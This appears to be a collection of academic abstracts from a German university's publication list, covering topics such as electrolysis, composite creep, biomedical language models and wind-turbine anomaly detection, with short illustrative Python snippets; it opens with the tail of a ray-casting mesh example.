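    hits = sum(ray_triangle_hit(point, direction, *tri) for tri in triangles)
    return hits % 2 == 1

# Unit cube as a closed triangle mesh, purely for demonstration.
V = [(0,0,0),(1,0,0),(1,1,0),(0,1,0),(0,0,1),(1,0,1),(1,1,1),(0,1,1)]
F = [(0,1,2),(0,2,3),(4,5,6),(4,6,7),(0,1,5),(0,5,4),
     (3,2,6),(3,6,7),(0,3,7),(0,7,4),(1,2,6),(1,6,5)]
CUBE = [(V[a], V[b], V[c]) for a, b, c in F]
```

On a GPU, the loop over triangles is exactly what the BVH traversal and intersection units replace, which is where the speedup for particle tracing comes from.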
Due to SARS-CoV-2, a law lecture for business administration students in the bachelor's programme at two different campuses of Hochschule Bonn-Rhein-Sieg, with more than 300 students, was fully digitalized for the 2020 summer semester using the inverted classroom approach. Through an externally prescribed learning strategy with weekly work packages and the use of an asynchronous communication platform based on an instant messenger with audience-appropriate address, synchronous formats could be reduced to a necessary minimum. The results of the accompanying empirical study show that the new didactic concept for digital teaching satisfied the students' diverse needs. In particular, a "digital learning atmosphere" was created that students considered very conducive to their learning process. The induced learning strategy led to significant performance improvements. Measures that can also be recommended for post-pandemic teaching are discussed.
With the rise of right-wing populism in the United States, Brazil and Europe, it has become a topic of discussion, at least in expert circles, that the extensive commercial data surveillance by the large internet companies is not only a problem for the citizens directly affected but ultimately also has far-reaching societal consequences. Online hate and incitement, fake news, political campaign advertising and manipulation in social media have become an unmistakable threat to liberal democracies of the Western type.
Operating an ozone-evolving PEM electrolyser in tap water: A case study of water and ion transport
(2022)
While PEM water electrolysis could be a favourable technique for in situ sanitization with ozone, its application is mainly limited to the use of ultrapure water to achieve sufficient long-term stability. As additional charge carriers influence the occurring transport phenomena, we investigated the impact of different feed water qualities on the performance of a PEM tap water electrolyser for ozone evolution. The permeation of water and of the four most abundant cations (Na+, K+, Ca2+, Mg2+) is characterised during stand-by and powered operation at different charge densities to quantify the underlying transport mechanisms. Water transport is shown to increase linearly with the applied current (95 ± 2 mmol A−1 h−1) and occurs decoupled from ion permeation. Ion permeation is limited by the transfer of ions in water to the anode/PEM interface. The unstabilized operation of a PEM electrolyser in tap water leads to a pH gradient, which promotes the formation of magnesium and calcium carbonates and hydroxides on the cathode surface. The introduction of a novel auxiliary cathode in the anolytic compartment was shown to suppress ion permeation by close to 20%.
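As a back-of-the-envelope illustration of the reported water-transport coefficient (95 mmol A−1 h−1, taken from the abstract), the permeated water mass scales linearly with current; the cell current below is a hypothetical value chosen only for the example.

```python
# Worked example with the abstract's water-transport coefficient.
M_WATER = 18.015   # g/mol, molar mass of water
K_DRAG  = 95e-3    # mol A^-1 h^-1 (abstract: 95 +/- 2 mmol A^-1 h^-1)

def water_flux_g_per_h(current_a):
    """Water permeated through the PEM, in grams per hour, for a given current."""
    return current_a * K_DRAG * M_WATER
```

For a hypothetical 2 A cell this gives roughly 3.4 g of water transported per hour, independent of ion permeation as the abstract notes.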
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims at exploring and comparing online branding strategies of family SME (small and medium sized enterprises) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), as two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts in websites and social media. Descriptive statistics and t-test were conducted to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of the tools used and its geographic focus, to uncover online branding patterns of family wineries, thereby providing implications for the wine and tourism industries in lake regions. It compares the share of selected most-used words in the overall text of websites and social media, and presents the key findings from this innovative approach.
Modern PCR-based analytical techniques have reached sensitivity levels that allow for obtaining complete forensic DNA profiles from even tiny traces containing genomic DNA amounts as small as 125 pg. Yet these techniques have reached their limits when it comes to the analysis of traces such as fingerprints or single cells. One suggestion to overcome these limits has been the use of whole genome amplification (WGA) methods. These methods aim at increasing the copy number of genomic DNA and by this means generate more template DNA for subsequent analyses. Their application in forensic contexts has so far remained mostly an academic exercise: results have not shown significant improvements and have even raised additional analytical problems. Based on these disappointments, the forensic application of WGA had, until very recently, largely been abandoned. In the meantime, however, novel improved methods are pointing towards a perspective for WGA in specific forensic applications. This review article summarizes current knowledge about WGA in forensics and suggests the forensic analysis of single-donor bioparticles and of single cells as promising applications.
Shaping off-job life is becoming increasingly important for workers to increase and maintain their optimal functioning (i.e., feeling and performing well). Proactively shaping the job domain (referred to as job crafting) has been extensively studied, but crafting in the off-job domain has received markedly less research attention. Based on the Integrative Needs Model of Crafting, needs-based off-job crafting is defined as workers’ proactive and self-initiated changes in their off-job lives, which target psychological needs satisfaction. Off-job crafting is posited as a possible means for workers to fulfill their needs and enhance well-being and performance over time. We developed a new scale to measure off-job crafting and examined its relationships to optimal functioning in different work contexts in different regions around the world (the United States, Germany, Austria, Switzerland, Finland, Japan, and the United Kingdom). Furthermore, we examined the criterion, convergent, incremental, discriminant, and structural validity evidence of the Needs-based Off-job Crafting Scale using multiple methods (longitudinal and cross-sectional survey studies, an “example generation”-task). The results showed that off-job crafting was related to optimal functioning over time, especially in the off-job domain but also in the job domain. Moreover, the novel off-job crafting scale had good convergent and discriminant validity, internal consistency, and test–retest reliability. To conclude, our series of studies in various countries show that off-job crafting can enhance optimal functioning in different life domains and support people in performing their duties sustainably. Therefore, shaping off-job life may be beneficial in an intensified and continually changing and challenging working life.
Nanomedicine strategies were first adapted and successfully translated to clinical application for diseases such as cancer and diabetes. These strategies would no doubt benefit diseases with unmet needs, as in the case of leishmaniasis. The latter causes skin sores in the cutaneous form and affects internal organs in the visceral form. Treatment of cutaneous leishmaniasis (CL) aims at accelerating wound healing, reducing scarring and cosmetic morbidity, and preventing parasite transmission and relapse. Unfortunately, available treatments show only suboptimal effectiveness, and none of them were designed specifically for this disease condition. Tissue regeneration using nano-based devices coupled with drug delivery is currently being used in the clinic to address diabetic wounds. Thus, in this review, we analyse the current treatment options and critically examine the use of nanomedicine-based strategies to address CL wounds with a view to achieving scarless wound healing, targeting secondary bacterial infection and lowering drug toxicity.
This article addresses the role of vocational education and training venues in the context of vocational education for sustainable development (BBNE) and the related competence development. Drawing on the BIBB pilot project "NAUZUBI", it outlines a possible approach aimed at enabling integrative competence development on sustainability topics. The starting point are company sustainability audits, which in this approach served as contextualized entry points for vocational learning situations. These were reflected upon in coordinated steps in workplace and school-based learning. The article describes the basic concept and the corresponding implementation experiences. It also presents challenges and potentials for workplace learning, vocational school learning and cooperative learning across venues, and thus for integrative competence development.
Recent advances in Natural Language Processing have substantially improved contextualized representations of language. However, the inclusion of factual knowledge, particularly in the biomedical domain, remains challenging. Hence, many Language Models (LMs) are extended by Knowledge Graphs (KGs), but most approaches require entity linking (i.e., explicit alignment between text and KG entities). Inspired by single-stream multimodal Transformers operating on text, image and video data, this thesis proposes the Sophisticated Transformer trained on biomedical text and Knowledge Graphs (STonKGs). STonKGs incorporates a novel multimodal architecture based on a cross encoder that uses the attention mechanism on a concatenation of input sequences derived from text and KG triples, respectively. Over 13 million so-called text-triple pairs, coming from PubMed and assembled using the Integrated Network and Dynamical Reasoning Assembler (INDRA), were used in an unsupervised pre-training procedure to learn representations of biomedical knowledge in STonKGs. By comparing STonKGs to an NLP- and a KG-baseline (operating on either text or KG data) on a benchmark consisting of eight fine-tuning tasks, the proposed knowledge integration method applied in STonKGs was empirically validated. Specifically, on tasks with a comparatively small dataset size and a larger number of classes, STonKGs resulted in considerable performance gains, beating the F1-score of the best baseline by up to 0.083. Both the source code as well as the code used to implement STonKGs are made publicly available so that the proposed method of this thesis can be extended to many other biomedical applications.
Guzzo et al. (2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, 2016) and that big data provide grand opportunities (see also Oswald et al., 2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of creep compliance of particulate composites using empirical models always provides parameters depending on initial stress and material composition. The effort spent to connect model parameters with physical properties has not resulted in success yet. Further, during the creep, delamination between matrix and filler may occur depending on time and initial stress, reducing an interface adhesion and load transfer to filler particles. In this paper, the creep compliance curves of glass beads reinforced poly(butylene terephthalate) composites were fitted with Burgers and Findley models providing different sets of time-dependent model parameters for each initial stress. Despite the finding that the Findley model performs well in a primary creep, the Burgers model is more suitable if secondary creep comes into play; they allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependency is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and the majority of other creep models), it was selected to be introduced as a filler content-dependent parameter with the help of the cube in cube elementary volume approach of Paul. The analysis led to the time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
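The two empirical models named in the abstract have standard textbook forms, sketched below for orientation; the parameter values used in any evaluation are arbitrary illustrative numbers, not the fitted values from the study.

```python
import math

def burgers_compliance(t, E1, eta1, E2, eta2):
    """Burgers (four-element) model: instantaneous elastic + viscous flow
    + delayed elastic terms. Captures secondary creep via the t/eta1 term."""
    return 1.0 / E1 + t / eta1 + (1.0 / E2) * (1.0 - math.exp(-E2 * t / eta2))

def findley_compliance(t, J0, A, n):
    """Findley power law, J(t) = J0 + A * t**n; well suited to primary creep."""
    return J0 + A * t ** n
```

At t = 0 both reduce to the instantaneous compliance (1/E1 and J0, respectively), and both are monotonically increasing in t, consistent with the qualitative behavior the abstract describes.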
Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings is a well-known strategy to improve their energy efficiency in the current context of climate change. The development of renewable insulation materials can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to benchmark the environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component, sodium silicate. Sodium silicate's CO2 emissions depend on local production, transportation, and energy consumption; the results published in recent years vary widely, from 0.3 to 3.3 kg CO2-eq. kg-1. The overall GWP of the insulation system based on Miscanthus fibers, with properties complying with current thermal insulation regulations, reaches up to 95% savings in CO2 emissions compared to conventional systems. Carbon neutrality can be achieved with formulations in which the carbon dioxide emissions of the raw materials are balanced by renewable materials with a negative GWP.
The following considerations attempt, on the one hand, to continue the work on a specifically media-studies-informed interpretation of so-called crime fiction1 and to place it in the context of a reading that understands the dispositif 'literature and its media' as a relation or proportionality: as the "relation of literature to its media" and/or as the "relation of the media to literature".2
The medicalization thesis and the compression thesis are two "competing" approaches to the question of the state of health in which a longer life, and in particular the years of older age, is spent. Beyond the individual significance of the quantity and quality of life years, this question is highly relevant for the healthcare system: not only have the number and the share of older people risen in the past, but in the context of demographic change a further increase, including in life expectancy, is projected, and the effects on care needs and expenditure in the healthcare system may be considerable.
Medien-›Eingriffe‹
(2022)
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), energy-meteorological and load-related measurement data, among others, are collected; this poster presents an overview of their availability.
Context: In Ghana, total electricity consumption almost doubled between 2008 and 2018, according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. These blackouts, called "dumsor" in Ghana, pose a severe burden on the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
We benchmark the robustness of maximum likelihood based uncertainty estimation methods to outliers in training data for regression tasks. Outliers or noisy labels in training data result in degraded performance as well as incorrect estimation of uncertainty. We propose the use of a heavy-tailed distribution (Laplace distribution) to improve the robustness to outliers. This property is evaluated using standard regression benchmarks and on a high-dimensional regression task of monocular depth estimation, both containing outliers. In particular, heavy-tailed distribution based maximum likelihood provides better uncertainty estimates, better separation in uncertainty for out-of-distribution data, as well as better detection of adversarial attacks in the presence of outliers.
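The robustness argument can be made concrete with per-sample negative log-likelihoods (a minimal sketch in assumed notation, not the authors' code): the Gaussian NLL grows quadratically with the residual, the Laplace NLL only linearly, so a single outlier distorts the fitted parameters far less under the heavy-tailed likelihood.

```python
import math

def gaussian_nll(y, mu, sigma):
    """Negative log-likelihood of y under N(mu, sigma^2); quadratic in the residual."""
    return 0.5 * math.log(2 * math.pi * sigma ** 2) + (y - mu) ** 2 / (2 * sigma ** 2)

def laplace_nll(y, mu, b):
    """Negative log-likelihood of y under Laplace(mu, b); linear in the residual."""
    return math.log(2 * b) + abs(y - mu) / b
```

For an outlier ten scale units away from the mean, the Gaussian residual term contributes 50 to the loss while the Laplace residual term contributes only 10, which is the mechanism behind the improved outlier robustness.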
BACKGROUND: Humans demonstrate many physiological changes in microgravity for which long-duration head down bed rest (HDBR) is a reliable analog. However, information on how HDBR affects sensory processing is lacking.
OBJECTIVE: We previously showed [25] that microgravity alters the weighting applied to visual cues in determining the perceptual upright (PU), an effect that lasts long after return. Does long-duration HDBR have comparable effects?
METHODS: We assessed static spatial orientation using the luminous line test (subjective visual vertical, SVV) and the oriented character recognition test (PU) before, during and after 21 days of 6° HDBR in 10 participants. Methods were essentially identical to those previously used in orbit [25].
RESULTS: Overall, HDBR had no effect on the reliance on visual relative to body cues in determining the PU. However, when considering the three critical time points (pre-bed rest, end of bed rest, and 14 days post-bed rest) there was a significant decrease in reliance on visual relative to body cues, as found in microgravity. The ratio had an average time constant of 7.28 days and returned to pre-bed-rest levels within 14 days. The SVV was unaffected.
CONCLUSIONS: We conclude that bed rest can be a useful analog for the study of the perception of static self-orientation during long-term exposure to microgravity. More detailed work on the precise time course of our effects is needed in both bed rest and microgravity conditions.
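Assuming the reported recovery follows a simple exponential decay (τ = 7.28 days from the RESULTS section; the function below is an illustrative sketch, not the authors' model code), the residual shift in visual reliance evolves as:

```python
import math

TAU = 7.28  # days, average time constant reported in the abstract

def remaining_shift(t_days, delta=1.0):
    """Fraction of the initial post-bed-rest shift (delta, hypothetical unit
    step) still present t days after the end of bed rest."""
    return delta * math.exp(-t_days / TAU)
```

Under this reading, about 15% of the initial shift remains after 14 days, broadly consistent with the abstract's report that the ratio returned to pre-bed-rest levels within two weeks.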
Against the background of the COVID-19 pandemic, working from home has become widespread in Germany since 2020 and has since been used by many employers as a new way of working. The use of home office can have various positive and negative effects on employees, employers and society in general. To benefit from as many positive effects as possible, a sound home-office concept is required. This article outlines the requirements for such a concept and the fundamental prerequisites associated with working from home. Requirements of various kinds, from technical to social aspects, are considered, derived from a study conducted by the author. The focus of this article is on the critical success factors for ideal work in the home office, i.e., the requirements that are decisive for the successful implementation of a home-office concept and that influence the perceived effects of working from home. The study cited in this article was conducted as part of the final thesis of Mr. Jeske, on which the article is based.
This thesis deals with the development of a circuit concept and laboratory prototype of an external illumination unit for use in research on time-of-flight (ToF) cameras employing the amplitude-modulated continuous wave (AMCW) method. The external illumination acts as a high-power repeater of a ToF camera's internal illumination and is capable of emitting the high-frequency square-wave signals used by ToF cameras.
Since ToF cameras usually do not provide an electrical control signal (trigger signal) for operating an external illumination, this signal is derived from the camera's optical signal. For this purpose, a concept for an optical detector (trigger) is presented, consisting of a photodiode, a transimpedance amplifier and subsequent signal conditioning. It is also shown how a fast external illumination with high radiant power can be realized using a metal-oxide-semiconductor field-effect transistor (MOSFET) and four vertical-cavity surface-emitting lasers (VCSELs); two circuit concepts are presented, a series and a parallel connection of MOSFET and VCSELs. The light sources are VCSELs with a wavelength of 940 nm in the near-infrared (NIR), typical for ToF cameras.
It was shown that the optical trigger can convert signals of up to 100 MHz into electrical output signals. Square-wave trigger signals with rise times of 650 ps and fall times of 440 ps were achieved. The external illumination emitted signals of up to 100 MHz; in combination with the optical trigger, optical signals with rise times of 1.5 ns and fall times of 960 ps were achieved, at radiant powers of almost 7 W. The complete system of optical trigger and external illumination exhibits a latency of 16 ns. As a result of this work, a system was built that, based on the results achieved, can most likely be used as an external illumination for research purposes with various ToF cameras. The optical trigger and the illumination can also be used separately.
In accommodation for refugees, a high proportion of children live in an environment that was often created for and/or is dominated by adults. The physical conditions, the structure and the communal life on site therefore largely determine children's living environments. Yet children have special rights and needs. The protection of children and an environment conducive to healthy development are essential aspects enshrined in international agreements such as the UN Convention on the Rights of the Child, and they must be implemented. Although the German federal states are obliged under the national legal framework to ensure the protection of children in refugee accommodation, implementation is often not regulated in a binding manner. This analysis discusses children's-rights aspects of the protection of children in refugee accommodation, looks at activities and measures of the federal initiative for the protection of refugees in refugee accommodation launched by the Federal Ministry for Family Affairs, Senior Citizens, Women and Youth (BMFSFJ) and the United Nations Children's Fund (UNICEF), and reviews the latest secondary literature on child protection in collective accommodation. The aim of this contribution is to show which aspects favour the protection of children and where the challenges lie.
Annual Report 2021
(2022)
The electricity grid of the future will be built on renewable energy sources, which are highly variable and dependent on atmospheric conditions. In power grids with an increasingly high penetration of solar photovoltaics (PV), an accurate knowledge of the incoming solar irradiance is indispensable for grid operation and planning, and reliable irradiance forecasts are thus invaluable for energy system operators. In order to better characterise shortwave solar radiation in time and space, data from PV systems themselves can be used, since the measured power provides information about both irradiance and the optical properties of the atmosphere, in particular the cloud optical depth (COD). Indeed, in the European context with highly variable cloud cover, the cloud fraction and COD are important parameters in determining the irradiance, whereas aerosol effects are only of secondary importance.
The cube-in-cube approach was used by Paul and Ishai-Cohen to model and derive formulas for the filler-content-dependent Young's moduli of particle-filled composites, assuming perfect filler-matrix adhesion. Their formulas were chosen because of their simplicity and recalculated using an elementary volume (EV) approach which transforms spherical inclusions into cubic inclusions. The EV approach led to expressions for the composite moduli that allow introducing an adhesion factor kadh ranging from 0 to 1 to take reduced filler-matrix adhesion into account. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress-transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh values for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds [Formula: see text] and depends on the ratio of matrix modulus and filler modulus. The modified model allows a quick calculation for any particle-filled composite with known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of particle-filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements shows that stress distributions within the EV exhibit more shear stresses the more one deviates from the cubic arrangement. At high filler contents, the assumption that the property of the EV is representative of the whole composite holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 weight %). Thus, for the vast majority of commercially available particulate composites, the modified model can be applied.
Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
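For orientation, the classical Paul cube-in-cube estimate that the modification builds on can be computed in a few lines. A minimal sketch (function name ours; the article's kadh-modified expression is not reproduced here):

```python
def paul_modulus(E_m, E_f, v_f):
    # Classical Paul cube-in-cube estimate of a particle-filled composite's
    # Young's modulus, assuming perfect filler-matrix adhesion.
    m = E_f / E_m                 # filler-to-matrix modulus ratio
    a = v_f ** (2.0 / 3.0)        # load-bearing cross-section fraction of the EV
    return E_m * (1 + (m - 1) * a) / (1 + (m - 1) * (a - v_f))
```

The modified model of the article additionally scales the cubic inclusion's edge length by kadh, reducing the stress-transfer area that enters this estimate.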
Contract-based nature protection schemes are a voluntary mechanism, with a limited contract duration, that aims to raise the acceptance of biodiversity conservation practices in agriculture among farmers and other land users. The purpose of this paper is to analyse the institutional settings of contract-based nature protection in the German Rhine-Sieg district based on the "Institutions of Sustainability" (IoS) framework, and to outline how policy measures should be designed to encourage farmers to participate in contract-based nature protection programmes. This was achieved by answering research questions to identify the challenges, potentials and obstacles of a contract-based nature protection scheme in the different "sub-arenas" defined in the IoS framework, using qualitative research methods. The analysis shows that the main constraints on the successful implementation of contract-based nature protection schemes are the limited consideration of the impact of climate change during the contract period, the limited consideration of regional conditions in the measures taken on the ground, and an inflexible contract duration.
Deployment of modern data-driven machine learning methods, most often realized by deep neural networks (DNNs), in safety-critical applications such as health care, industrial plant control, or autonomous driving is highly challenging due to numerous model-inherent shortcomings. These shortcomings are diverse and range from a lack of generalization over insufficient interpretability and implausible predictions to directed attacks by means of malicious inputs. Cyber-physical systems employing DNNs are therefore likely to suffer from so-called safety concerns, properties that preclude their deployment as no argument or experimental setup can help to assess the remaining risk. In recent years, an abundance of state-of-the-art techniques aiming to address these safety concerns has emerged. This chapter provides a structured and broad overview of them. We first identify categories of insufficiencies and then describe research activities aiming at their detection, quantification, or mitigation. Our work addresses machine learning experts and safety engineers alike: the former might profit from the broad range of machine learning topics covered and the discussions on limitations of recent methods; the latter might gain insights into the specifics of modern machine learning methods. We hope that this contribution fuels discussions on desiderata for machine learning systems and strategies for advancing existing approaches accordingly.
This study investigates the initial stage of the thermo-mechanical crystallization behavior for uni- and biaxially stretched polyethylene. The models are based on a mesoscale molecular dynamics approach. We take constraints that occur in real-life polymer processing into account, especially with respect to the blowing stage of the extrusion blow-molding process. For this purpose, we deform our systems using a wide range of stretching levels before they are quenched. We discuss the effects of the stretching procedures on the micro-mechanical state of the systems, characterized by entanglement behavior and nematic ordering of chain segments. For the cooling stage, we use two different approaches which allow for free or hindered shrinkage, respectively. During cooling, crystallization kinetics are monitored: We precisely evaluate how the interplay of chain length, temperature, local entanglements and orientation of chain segments influence crystallization behavior. Our models reveal that the main stretching direction dominates microscopic states of the different systems. We are able to show that crystallization mainly depends on the (dis-)entanglement behavior. Nematic ordering plays a secondary role.
Bonding wires made of aluminum are the most widely used means for transmitting electrical signals in power electronic devices. During operation, different cyclic mechanical and thermal stresses can lead to fatigue loads and failure of the bonding wires. Predicting or preventing wire failure by design is not yet possible in all cases. The following work presents meaningful fatigue tests in small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires with a diameter of 300 μm each. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with increasing stress ratio, which can be displayed in a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. Scaling the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Given these very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires under arbitrary loading seems possible and will be further investigated.
West Africa has great potential for the use of solar energy systems, as it combines a high solar radiation rate with a lack of energy production. It is also a very aerosol-rich region; the impact of aerosols on photovoltaic (PV) use depends both on atmospheric conditions and on the solar technology deployed. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana over the period 2016 to 2020, and their impact on the radiation intensity and efficiency of a PV cell. The study used AERONET ground data (Giles et al., 2019) and satellite data produced by CAMS (Gschwind et al., 2019), both of which provide aerosol optical depth (AOD) and meteorological parameters used for radiative transfer calculations with libRadtran (Emde et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. For both data sets, the aerosol is mainly composed of dust and organic matter, with a strongly increased AOD load during the harmattan period (December-February), also due to the fires observed during this period.
While many proteins are known clients of heat shock protein 90 (Hsp90), it is unclear whether the transcription factor, thyroid hormone receptor beta (TRβ), interacts with Hsp90 to control hormonal perception and signaling. Higher Hsp90 expression in mouse fibroblasts was elicited by the addition of triiodothyronine (T3). T3 bound to Hsp90 and enhanced adenosine triphosphate (ATP) binding of Hsp90 due to a specific binding site for T3, as identified by molecular docking experiments. The binding of TRβ to Hsp90 was prevented by T3 or by the thyroid mimetic sobetirome. Purified recombinant TRβ trapped Hsp90 from cell lysate or purified Hsp90 in pull-down experiments. The affinity of Hsp90 for TRβ was 124 nM. Furthermore, T3 induced the release of bound TRβ from Hsp90, which was shown by streptavidin-conjugated quantum dot (SAv-QD) masking assay. The data indicate that the T3 interaction with TRβ and Hsp90 may be an amplifier of the cellular stress response by blocking Hsp90 activity.
Hydrogen‐Bonded Cholesteric Liquid Crystals—A Modular Approach Toward Responsive Photonic Materials
(2022)
A supramolecular approach for photonic materials based on hydrogen-bonded cholesteric liquid crystals is presented. The modular toolbox of low-molecular-weight hydrogen-bond donors and acceptors provides a simple route toward liquid crystalline materials with tailor-made thermal and photonic properties. Initial studies reveal broad application potential of the liquid crystalline thin films for chemo- and thermosensing. The chemosensing performance is based on the interruption of the intermolecular forces between the donor and acceptor moieties by interference with halogen-bond donors. Future studies will expand the scope of analytes and sensing in aqueous media. In addition, the implementation of the reported materials in additive manufacturing and printed photonic devices is planned.
Cathepsin K (CatK) is a target for the treatment of osteoporosis, arthritis, and bone metastasis. Peptidomimetics with a cyanohydrazide warhead represent a new class of highly potent CatK inhibitors; however, their binding mechanism is unknown. We investigated two model cyanohydrazide inhibitors with differently positioned warheads: an azadipeptide nitrile Gü1303 and a 3-cyano-3-aza-β-amino acid Gü2602. Crystal structures of their covalent complexes were determined with mature CatK as well as a zymogen-like activation intermediate of CatK. Binding mode analysis, together with quantum chemical calculations, revealed that the extraordinary picomolar potency of Gü2602 is entropically favoured by its conformational flexibility at the nonprimed-primed subsites boundary. Furthermore, we demonstrated by live cell imaging that cyanohydrazides effectively target mature CatK in osteosarcoma cells. Cyanohydrazides also suppressed the maturation of CatK by inhibiting the autoactivation of the CatK zymogen. Our results provide structural insights for the rational design of cyanohydrazide inhibitors of CatK as potential drugs.
Designing training in nine process steps! Digitalization of the master's module "Integrierte Managementsysteme" in the degree programme "Material Science and Sustainability Methods" at the Department of Natural Sciences of Hochschule Bonn-Rhein-Sieg. Using the example of a course taught in person for many years, with lectures and seminar-style exercises, it is shown how the design and delivery of teaching that conveys exam-relevant competencies can also succeed online. The appropriate setting of the teaching and learning process, observing quality criteria and recommendations for action, is relevant for any kind of training in universities, public authorities, companies and other organizations.
High-dimensional and multi-variate data from dynamical systems such as turbulent flows and wind turbines can be analyzed with deep learning due to its capacity to learn representations in lower-dimensional manifolds. Two challenges of interest arise from data generated from these systems, namely, how to anticipate wind turbine failures and how to better understand air flow through car ventilation systems. There are deep neural network architectures that can project data into a lower-dimensional space with the goal of identifying and understanding patterns that are not distinguishable in the original dimensional space. Learning data representations in lower dimensions via non-linear mappings allows one to perform data compression, data clustering (for anomaly detection), data reconstruction and synthetic data generation.
In this work, we explore the potential of variational autoencoders (VAE) to learn low-dimensional data representations in order to tackle the problems posed by the two dynamical systems mentioned above. A VAE is a neural network architecture that combines the mechanisms of the standard autoencoder with variational Bayes. The goal is to train a neural network to minimize a loss function defined by a reconstruction term together with a variational term, defined as a Kullback-Leibler (KL) divergence.
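The loss described above can be written out directly. A minimal numpy sketch (function name ours) of the reconstruction-plus-KL objective for a diagonal-Gaussian approximate posterior:

```python
import numpy as np

def vae_loss(x, x_hat, mu, log_var):
    # Reconstruction term (mean squared error between input and decoder
    # output) plus the closed-form KL divergence between the approximate
    # posterior N(mu, exp(log_var)) and the standard normal prior.
    recon = np.mean((x - x_hat) ** 2)
    kl = -0.5 * np.mean(1.0 + log_var - mu ** 2 - np.exp(log_var))
    return recon + kl
```

In a trained VAE, `mu` and `log_var` are the encoder outputs for a sample; frameworks typically weight the two terms against each other, which is omitted here.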
The report discusses the results obtained for the two different data domains: wind turbine time series and turbulence data from computational fluid dynamics (CFD) simulations.
We report on the reconstruction, clustering and unsupervised anomaly detection of wind turbine multi-variate time series data using a variant of a VAE called Variational Recurrent Autoencoder (VRAE). We trained a VRAE to cluster normal and abnormal wind turbine series (two-class problem) as well as normal and multiple abnormal series (multi-class problem). We found that the model is capable of distinguishing between normal and abnormal cases by reducing the dimensionality of the input data and projecting it to two dimensions using techniques such as Principal Component Analysis (PCA) and t-distributed stochastic neighbor embedding (t-SNE). A set of anomaly scoring methods is applied on top of these latent vectors in order to compute unsupervised clusterings. We achieved an accuracy of up to 96% with the KMeans++ algorithm.
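The latent-space clustering step can be illustrated on stand-in data. A sketch assuming synthetic two-blob "latent vectors" in place of real VRAE encodings (all numbers illustrative):

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
# Stand-in latent vectors: two separated blobs mimic the encodings of
# normal vs. abnormal turbine series (the real VRAE encoder is not shown).
Z = np.vstack([rng.normal(0.0, 0.5, size=(100, 16)),
               rng.normal(3.0, 0.5, size=(100, 16))])

Z2 = PCA(n_components=2).fit_transform(Z)  # project latents to 2-D
# k-means++ is the default initialization of scikit-learn's KMeans
labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(Z2)

# Agreement with the known grouping (cluster label permutation is arbitrary)
truth = np.array([0] * 100 + [1] * 100)
accuracy = max(np.mean(labels == truth), np.mean(labels != truth))
```

In the report's setting, anomaly scores are computed on the latent vectors themselves; here the cluster assignment plays that role.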
We also report the data reconstruction and generation results for two-dimensional turbulence slices corresponding to a CFD simulation of an HVAC air duct. For this, we trained a Convolutional Variational Autoencoder (CVAE). We found that the model is capable of reconstructing laminar flows up to a certain degree of resolution, as well as generating synthetic turbulence data from the learned latent distribution.
